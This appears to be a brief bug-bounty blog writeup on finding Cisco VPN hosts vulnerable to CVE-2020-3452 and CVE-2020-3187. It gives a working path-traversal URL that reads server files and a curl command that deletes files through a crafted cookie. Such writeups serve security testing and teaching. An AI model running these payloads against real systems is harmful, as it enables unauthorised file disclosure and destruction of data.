Hunting for CVE: 2020–3187 , 2020–3452

Paras Arora
2 min readAug 11, 2020

--

Back with another writeup. In this I will be discussing about how easy is to hunt for CVE:2020–3187&, 2020-3452 and what are the steps involved in it.

NOTE: For this we need to focus on subdomains of targets which are working on Cisco VPN.

Let’s Start

Finding Subdomains: Sublist3r , AssetFinder , Amass

I simply used above tools to find the subdomains and saved the entire result in .txt file.

Now extract the sub domains which all are having VPN keyword in it.

Example: vpn.example.com , vpn-us-east-1.example.com

So, on visiting these kinds of sub domains I got

Now, Reload the above page and capture the request in BurpSuite as shown below

CVE:2020–3452

Modify the Request URL with : +CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

and we can read the content of the files as shown in the response.

CVE:2020–3187

In , this we are able to delete the files.

I deleted the logo file present on the server so as to make the PoC instead of deleting any other important file.

Below is the image which confirms the presence of file on the server.

Now, to delete this just hit the following command on your terminals.

curl -H “Cookie: token=../+CSCOU+/csco_logo.gif” https://target/+CSCOE+/session_password.html

After, this the file was deleted from the server

Thanks for reading!!

--

--

Paras Arora
Paras Arora

Written by Paras Arora

Social media: @parasarora06 , Penetration Tester | Application Security

No responses yet